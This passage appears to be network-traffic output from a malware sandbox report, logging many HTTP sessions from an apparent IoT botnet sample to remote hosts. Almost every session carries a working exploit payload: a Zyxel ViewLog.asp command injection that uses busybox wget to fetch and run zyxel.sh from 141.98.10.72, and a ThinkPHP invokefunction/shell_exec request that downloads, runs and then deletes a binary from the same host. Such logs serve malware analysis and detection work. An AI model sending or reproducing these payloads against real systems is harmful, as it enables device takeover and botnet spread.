                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:02.393284082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:43.352102041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      205192.168.2.154178031.136.84.708080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:21.649605036 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:22.330313921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:23.674362898 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:26.554284096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:31.930097103 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:42.681832075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:04.441211939 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:47.447905064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      206192.168.2.155772285.209.136.2088080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:21.672522068 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:21.915750027 CET1286INHTTP/1.0 400 Bad Request
                                                      Server: squid/3.1.23
                                                      Mime-Version: 1.0
                                                      Date: Wed, 14 Feb 2024 08:03:32 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 3167
                                                      X-Squid-Error: ERR_INVALID_URL 0
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      207192.168.2.154393285.89.232.2158080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:21.683109045 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      208192.168.2.153418031.44.134.818080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:21.696233988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      209192.168.2.153670894.187.105.218080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:21.707484961 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      210192.168.2.154689295.86.95.2348080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:21.717437983 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      211192.168.2.1539906112.167.233.680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:22.020632029 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:22.298949003 CET155INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 345
                                                      Connection: close
                                                      Date: Wed, 14 Feb 2024 08:29:22 GMT
                                                      Server: lighttpd/1.4.55
                                                      Feb 14, 2024 09:29:22.298969030 CET345INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      212192.168.2.1536342112.159.70.23880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:22.049211025 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:22.358508110 CET516INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 349
                                                      Connection: close
                                                      Date: Wed, 14 Feb 2024 08:29:21 GMT
                                                      Server: lighttpd/1.4.33
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      213192.168.2.1559886112.45.120.18780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:22.114845037 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:22.488478899 CET481INHTTP/1.1 400 Bad Request
                                                      Server: Tengine
                                                      Date: Wed, 14 Feb 2024 08:29:22 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 249
                                                      Connection: close
                                                      Via: cache6.cn6632[,0]
                                                      Timing-Allow-Origin: *
                                                      EagleId: 0000000017078993623086328e
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      214192.168.2.1559888112.45.120.18780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:22.117429972 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:22.493874073 CET481INHTTP/1.1 400 Bad Request
                                                      Server: Tengine
                                                      Date: Wed, 14 Feb 2024 08:29:22 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 249
                                                      Connection: close
                                                      Via: cache8.cn6632[,0]
                                                      Timing-Allow-Origin: *
                                                      EagleId: 0000000017078993623083927e
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      215192.168.2.155591431.12.75.1578080
                                                      TimestampBytes transferredDirectionData
